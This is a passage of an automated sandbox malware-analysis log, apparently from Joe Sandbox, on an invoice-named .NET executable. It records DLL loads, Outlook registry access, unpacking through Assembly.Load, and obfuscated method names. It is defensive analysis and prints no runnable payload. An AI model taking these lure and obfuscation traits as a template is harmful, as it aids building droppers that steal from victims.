                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICE, PACKING LIST, COPY BL.exe, INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2zqVCuEmR.exe, 00000005.00000002.2641515194.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp, 2zqVCuEmR.exe, 00000007.00000002.2643227394.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.cs.Net Code: CMeBfvN5Or System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.cs.Net Code: CMeBfvN5Or System.Reflection.Assembly.Load(byte[])
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.6e60000.3.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 0_2_07054133 push ecx; ret 0_2_07054134
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041F003 pushfd ; iretd 3_2_0041F01B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00414086 push esi; ret 3_2_00414095
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00417939 push FFFFFFD7h; retf 3_2_0041793E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040DA26 push es; iretd 3_2_0040DA2E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00418AD8 pushad ; iretd 3_2_00418ADF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041940F push edx; ret 3_2_00419411
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00419416 push edi; retf 3_2_00419417
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_004075C0 push esi; retf 3_2_004075C8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040AD9E push ebp; retf 3_2_0040AD9F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040D5AD push 43AEBFE9h; ret 3_2_0040D5B9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00418654 push ds; ret 3_2_00418656
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00403660 push eax; ret 3_2_00403662
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00401669 push eax; retf 3_2_0040166A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0040760B push ebx; iretd 3_2_0040760D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0041D612 pushfd ; ret 3_2_0041D620
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00414EC6 push esp; ret 3_2_00414EC7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00401FEE pushad ; retf 3_2_00401FEF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0160225F pushad ; ret 3_2_016027F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016027FA pushad ; ret 3_2_016027F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016309AD push ecx; mov dword ptr [esp], ecx3_2_016309B6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0160283D push eax; iretd 3_2_01602858
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01601328 push eax; iretd 3_2_01601369
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB7DB7 push esi; ret 5_2_04FB7DC6
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FC2D34 pushfd ; iretd 5_2_04FC2D4C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBB66A push FFFFFFD7h; retf 5_2_04FBB66F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB1757 push es; iretd 5_2_04FB175F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBC809 pushad ; iretd 5_2_04FBC810
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBD140 push edx; ret 5_2_04FBD142
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBD147 push edi; retf 5_2_04FBD148
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FAB2F1 push esi; retf 5_2_04FAB2F9
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: section name: .text entropy: 7.667158912734943
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, HRRyNLWP3aCReQ34uIv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQCZ9TRMtM', 'NtnZGrTLNk', 'diQZMWDybW', 'eayZVRvoy9', 'JSGZj6ll1u', 'WUnZnY0KY5', 'QcZZm7IwWc'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.csHigh entropy of concatenated method names: 'sSRRV5JD0J', 'GDTRj4TWu7', 'TriRntCfGT', 'H5WRm3GqQL', 'SL9RFuUAK4', 'lMORQXvrt4', 'AfKRLay188', 'll9ROSSyjx', 'kmmR53lNfx', 'iedRq0TnZj'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, zUdOj2YCX8SVbVqi5j.csHigh entropy of concatenated method names: 'ro6kTTBg4h', 'C1KkoRtHCt', 'Td9kftfJxN', 'NUYkbXtVSy', 'OjJkpopJx8', 'sdkkyubeJa', 'qyBk0J7DNC', 'VlWkIiqlPL', 'w38kaiFMFR', 'FIqkSi2NSA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, gX0RypnLwsmDbqthTf.csHigh entropy of concatenated method names: 'ToString', 'DrSK9NAo3q', 'ufvKUQm8Pm', 'ExTK14ADWW', 'JviKrpjcYv', 'PHLKC3HVV8', 'UB0Kif8WXu', 'fVtK3Jxfgq', 'rIoKEcUGGh', 'RXbKYig7AH'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, C6biJfSm4Srs3LV1MC.csHigh entropy of concatenated method names: 'esthpy5d4G', 'OkZh0GTHKt', 'GSEX10Cq9p', 'KVXXrI9p2Q', 'BS6XCC6TEY', 'g8kXiRnUYy', 'XnRX3Za7mO', 'g5bXE4yyLT', 'DDsXYDAWoD', 'pMkX2C72ov'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, aXR38bWBo0XaIiEmX5D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Om2xvGX5Up', 'Ol6xZVdvrS', 'nlmxgMW2YE', 'Vkpxxb7feD', 'IkFx4apv2Z', 'HYjxuJoh8L', 'Vi3xA4Lmjl'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, JF6ugEDBOHDgiaJMAa.csHigh entropy of concatenated method names: 'Iwef4FhDu', 'qwhbvTvIv', 'sqxylHgKU', 'QLu0V5lA7', 'Fa2aFCBoq', 'cAhSFddOc', 'e91DE6EfnT4EWybjMB', 'sri9f75abKEcGNrMRf', 'dZ0NsxXDv', 'U5aZXKOI4'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, VAmO9CMD1lR5QC0SBA.csHigh entropy of concatenated method names: 'QRAeITsrJ7', 'iqmeaoKOMR', 'IL0esM45B1', 'xGieUG3oPI', 'FnQerAgbU4', 'wBteCeY9oO', 'GOMe3aCFBk', 'cG6eEISJgA', 'bK0e2QkLU2', 'e2we9fbgnU'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.csHigh entropy of concatenated method names: 'RuL6tIwLeC', 'RWk68N7EYP', 'LYq6R53mip', 'oHm6XECYMf', 'HS76hPrBjY', 'qNy6dqBpHj', 'vbo6kj73Kn', 'IRT6lWRtcK', 'uO16Ju1ZtE', 'JwJ6cFT3Co'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, e9Mmg0Rv3K7xsmI8Ef.csHigh entropy of concatenated method names: 'Dispose', 'IbIW52D9o2', 'm9gDUCA7c0', 'qrcw5iopLD', 'zdAWqrIFQA', 'aLlWzHxCiM', 'ProcessDialogKey', 'yvCDPgXPdw', 'qZ9DW7ZXpI', 'feGDDCbc9j'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Pd2ViPVyZ3J54hx0jb.csHigh entropy of concatenated method names: 'Pr8H2Up5ru', 'IQ0HGmTBEq', 'T5yHVh8Q8n', 'QGPHjehVMV', 'iKYHUJFRri', 'jwQH12Kpv1', 'XQAHrmbBbk', 'K3IHCq2KYN', 'MpfHigkbcT', 'YRPH3h1xBB'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, qClTUcspryY0Ri1c5R.csHigh entropy of concatenated method names: 'yP2dt0EeDT', 'OTJdR2KHhS', 'PxLdh9s5fM', 'jp5dkFZOIF', 'naLdlA3V1u', 'YZ7hF7tfxf', 'jmihQTyFtJ', 'abuhLQAZRC', 'YcwhORSKy5', 'xk4h5xTNOu'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, rwmJGXzFsbk0hl9Alh.csHigh entropy of concatenated method names: 'aswZyHMeTe', 'ctQZI6Joej', 'Pi7ZanZFbs', 'FEcZssRcEZ', 'v9SZU0HNB1', 'FbcZrtG1Vs', 'xM6ZCtRV5b', 'eplZA8SsQu', 'BUDZTL12yi', 'CVuZoacApf'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, TxhjfXXN2aKpUAvPay.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'zSjD5TmgHP', 'DA2DqbKGAh', 'fXoDzvFaMI', 'ira6PSVsqZ', 'UZs6WMnbHk', 'KsC6DXxn5g', 'fqc66qJPxn', 'SZPK1mRVHsOZSChoLTX'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, SHwLbNLjmrbI2D9o2f.csHigh entropy of concatenated method names: 'yW3vHElI2T', 'lWHvwUpx7D', 'z2mvvKoOWZ', 'NDavgt7BGp', 'mEfv4Y4eG8', 'zKnvADCygH', 'Dispose', 's6qN80cWrQ', 'wB4NRxvTNk', 'LtUNXtSPeA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, B7MvwYmotUeZI0KC6v.csHigh entropy of concatenated method names: 'QBMwcfDplp', 'as7w7W7sAR', 'ToString', 'NIGw8wHam4', 'LcxwRrXYsn', 'vWjwX2A4qb', 'hkOwhpC0KO', 'uxcwdHdj4k', 'Eocwkh3x0h', 'HFmwllJU6U'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, SndfNPWWcIjGQ5cov4N.csHigh entropy of concatenated method names: 'suEZqN9WfG', 'rMDZzucpoY', 'IyngPXMpkd', 'Lt6gWDCjFu', 'JnogDQwoSx', 'qdHg6TwxkK', 'gb8gBGNQup', 'yrvgtcfAri', 'SGeg8TreWF', 'RmcgRjAdnx'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, nKNMlv3TvFbq76vphQ.csHigh entropy of concatenated method names: 'Ksck8GJ65Z', 'gyskXFEExd', 'fHwkdbTicL', 'tUWdqrnB3A', 'LCydz6aeQC', 'plYkPiMfHD', 'e8vkWsyh9H', 'ITdkDs47Gr', 'HINk6dEoKZ', 'YRKkB0OLH2'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, aCx5lcaTP33rxRCNCR.csHigh entropy of concatenated method names: 'OB2Xb18NJK', 'QhIXyup3Sn', 'tFRXIPy3jH', 'HtmXaYPJq9', 'dL4XH8YUmK', 'FAjXKkn04c', 'DUWXwlcoxj', 'muEXNlFRj9', 'sAUXv9XrJe', 'JnjXZSU2kP'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Jbc9jGqqCXZJTkKi4x.csHigh entropy of concatenated method names: 'obRZXq5tK3', 'IjQZhVRR4t', 'g7xZdWjns2', 'TcSZkXS3Sr', 'lTCZvMRqC0', 'ndMZlxkES9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, mh9HEsBx1KT4UfExJq.csHigh entropy of concatenated method names: 'MMqWkudlFe', 'kxJWlFsmZR', 'mTPWc33rxR', 'JNCW7Ry6bi', 'WV1WHMCwCl', 'xUcWKpryY0', 'XOrxN54ynAib0qyAGA', 'ToVLRouRoV7MECmtNC', 'pm6WWQF6yM', 'tPeW6Ky2oZ'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, h1kPvLQgbMKecy8pru.csHigh entropy of concatenated method names: 'AJ1wOIe50f', 'itSwqbd7dU', 'U2PNPiVMdD', 'yTlNWHiF9I', 'f0Pw945GVs', 'dnPwGpeSB9', 'uWmwMBoSI5', 'wyVwVobRSs', 'wskwjbkp7y', 'l5cwnbBGeg'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, JgXPdw5wZ97ZXpI8eG.csHigh entropy of concatenated method names: 'YFxvsBZnLf', 'UM2vUb1ujG', 'guWv130pwd', 'vFrvrsS21A', 'QfQvCdBbhC', 'Fnhvi0nxIV', 'Fxbv3fBgUm', 'mwpvExEaOq', 'eV9vYTRbU8', 'KdOv2HaOu6'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, HRRyNLWP3aCReQ34uIv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQCZ9TRMtM', 'NtnZGrTLNk', 'diQZMWDybW', 'eayZVRvoy9', 'JSGZj6ll1u', 'WUnZnY0KY5', 'QcZZm7IwWc'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.csHigh entropy of concatenated method names: 'sSRRV5JD0J', 'GDTRj4TWu7', 'TriRntCfGT', 'H5WRm3GqQL', 'SL9RFuUAK4', 'lMORQXvrt4', 'AfKRLay188', 'll9ROSSyjx', 'kmmR53lNfx', 'iedRq0TnZj'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, zUdOj2YCX8SVbVqi5j.csHigh entropy of concatenated method names: 'ro6kTTBg4h', 'C1KkoRtHCt', 'Td9kftfJxN', 'NUYkbXtVSy', 'OjJkpopJx8', 'sdkkyubeJa', 'qyBk0J7DNC', 'VlWkIiqlPL', 'w38kaiFMFR', 'FIqkSi2NSA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, gX0RypnLwsmDbqthTf.csHigh entropy of concatenated method names: 'ToString', 'DrSK9NAo3q', 'ufvKUQm8Pm', 'ExTK14ADWW', 'JviKrpjcYv', 'PHLKC3HVV8', 'UB0Kif8WXu', 'fVtK3Jxfgq', 'rIoKEcUGGh', 'RXbKYig7AH'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, C6biJfSm4Srs3LV1MC.csHigh entropy of concatenated method names: 'esthpy5d4G', 'OkZh0GTHKt', 'GSEX10Cq9p', 'KVXXrI9p2Q', 'BS6XCC6TEY', 'g8kXiRnUYy', 'XnRX3Za7mO', 'g5bXE4yyLT', 'DDsXYDAWoD', 'pMkX2C72ov'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, aXR38bWBo0XaIiEmX5D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Om2xvGX5Up', 'Ol6xZVdvrS', 'nlmxgMW2YE', 'Vkpxxb7feD', 'IkFx4apv2Z', 'HYjxuJoh8L', 'Vi3xA4Lmjl'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, JF6ugEDBOHDgiaJMAa.csHigh entropy of concatenated method names: 'Iwef4FhDu', 'qwhbvTvIv', 'sqxylHgKU', 'QLu0V5lA7', 'Fa2aFCBoq', 'cAhSFddOc', 'e91DE6EfnT4EWybjMB', 'sri9f75abKEcGNrMRf', 'dZ0NsxXDv', 'U5aZXKOI4'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, VAmO9CMD1lR5QC0SBA.csHigh entropy of concatenated method names: 'QRAeITsrJ7', 'iqmeaoKOMR', 'IL0esM45B1', 'xGieUG3oPI', 'FnQerAgbU4', 'wBteCeY9oO', 'GOMe3aCFBk', 'cG6eEISJgA', 'bK0e2QkLU2', 'e2we9fbgnU'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.csHigh entropy of concatenated method names: 'RuL6tIwLeC', 'RWk68N7EYP', 'LYq6R53mip', 'oHm6XECYMf', 'HS76hPrBjY', 'qNy6dqBpHj', 'vbo6kj73Kn', 'IRT6lWRtcK', 'uO16Ju1ZtE', 'JwJ6cFT3Co'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, e9Mmg0Rv3K7xsmI8Ef.csHigh entropy of concatenated method names: 'Dispose', 'IbIW52D9o2', 'm9gDUCA7c0', 'qrcw5iopLD', 'zdAWqrIFQA', 'aLlWzHxCiM', 'ProcessDialogKey', 'yvCDPgXPdw', 'qZ9DW7ZXpI', 'feGDDCbc9j'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Pd2ViPVyZ3J54hx0jb.csHigh entropy of concatenated method names: 'Pr8H2Up5ru', 'IQ0HGmTBEq', 'T5yHVh8Q8n', 'QGPHjehVMV', 'iKYHUJFRri', 'jwQH12Kpv1', 'XQAHrmbBbk', 'K3IHCq2KYN', 'MpfHigkbcT', 'YRPH3h1xBB'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, qClTUcspryY0Ri1c5R.csHigh entropy of concatenated method names: 'yP2dt0EeDT', 'OTJdR2KHhS', 'PxLdh9s5fM', 'jp5dkFZOIF', 'naLdlA3V1u', 'YZ7hF7tfxf', 'jmihQTyFtJ', 'abuhLQAZRC', 'YcwhORSKy5', 'xk4h5xTNOu'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, rwmJGXzFsbk0hl9Alh.csHigh entropy of concatenated method names: 'aswZyHMeTe', 'ctQZI6Joej', 'Pi7ZanZFbs', 'FEcZssRcEZ', 'v9SZU0HNB1', 'FbcZrtG1Vs', 'xM6ZCtRV5b', 'eplZA8SsQu', 'BUDZTL12yi', 'CVuZoacApf'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, TxhjfXXN2aKpUAvPay.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'zSjD5TmgHP', 'DA2DqbKGAh', 'fXoDzvFaMI', 'ira6PSVsqZ', 'UZs6WMnbHk', 'KsC6DXxn5g', 'fqc66qJPxn', 'SZPK1mRVHsOZSChoLTX'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, SHwLbNLjmrbI2D9o2f.csHigh entropy of concatenated method names: 'yW3vHElI2T', 'lWHvwUpx7D', 'z2mvvKoOWZ', 'NDavgt7BGp', 'mEfv4Y4eG8', 'zKnvADCygH', 'Dispose', 's6qN80cWrQ', 'wB4NRxvTNk', 'LtUNXtSPeA'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, B7MvwYmotUeZI0KC6v.csHigh entropy of concatenated method names: 'QBMwcfDplp', 'as7w7W7sAR', 'ToString', 'NIGw8wHam4', 'LcxwRrXYsn', 'vWjwX2A4qb', 'hkOwhpC0KO', 'uxcwdHdj4k', 'Eocwkh3x0h', 'HFmwllJU6U'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, SndfNPWWcIjGQ5cov4N.csHigh entropy of concatenated method names: 'suEZqN9WfG', 'rMDZzucpoY', 'IyngPXMpkd', 'Lt6gWDCjFu', 'JnogDQwoSx', 'qdHg6TwxkK', 'gb8gBGNQup', 'yrvgtcfAri', 'SGeg8TreWF', 'RmcgRjAdnx'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, nKNMlv3TvFbq76vphQ.csHigh entropy of concatenated method names: 'Ksck8GJ65Z', 'gyskXFEExd', 'fHwkdbTicL', 'tUWdqrnB3A', 'LCydz6aeQC', 'plYkPiMfHD', 'e8vkWsyh9H', 'ITdkDs47Gr', 'HINk6dEoKZ', 'YRKkB0OLH2'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, aCx5lcaTP33rxRCNCR.csHigh entropy of concatenated method names: 'OB2Xb18NJK', 'QhIXyup3Sn', 'tFRXIPy3jH', 'HtmXaYPJq9', 'dL4XH8YUmK', 'FAjXKkn04c', 'DUWXwlcoxj', 'muEXNlFRj9', 'sAUXv9XrJe', 'JnjXZSU2kP'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Jbc9jGqqCXZJTkKi4x.csHigh entropy of concatenated method names: 'obRZXq5tK3', 'IjQZhVRR4t', 'g7xZdWjns2', 'TcSZkXS3Sr', 'lTCZvMRqC0', 'ndMZlxkES9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, mh9HEsBx1KT4UfExJq.csHigh entropy of concatenated method names: 'MMqWkudlFe', 'kxJWlFsmZR', 'mTPWc33rxR', 'JNCW7Ry6bi', 'WV1WHMCwCl', 'xUcWKpryY0', 'XOrxN54ynAib0qyAGA', 'ToVLRouRoV7MECmtNC', 'pm6WWQF6yM', 'tPeW6Ky2oZ'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, h1kPvLQgbMKecy8pru.csHigh entropy of concatenated method names: 'AJ1wOIe50f', 'itSwqbd7dU', 'U2PNPiVMdD', 'yTlNWHiF9I', 'f0Pw945GVs', 'dnPwGpeSB9', 'uWmwMBoSI5', 'wyVwVobRSs', 'wskwjbkp7y', 'l5cwnbBGeg'
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, JgXPdw5wZ97ZXpI8eG.csHigh entropy of concatenated method names: 'YFxvsBZnLf', 'UM2vUb1ujG', 'guWv130pwd', 'vFrvrsS21A', 'QfQvCdBbhC', 'Fnhvi0nxIV', 'Fxbv3fBgUm', 'mwpvExEaOq', 'eV9vYTRbU8', 'KdOv2HaOu6'
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
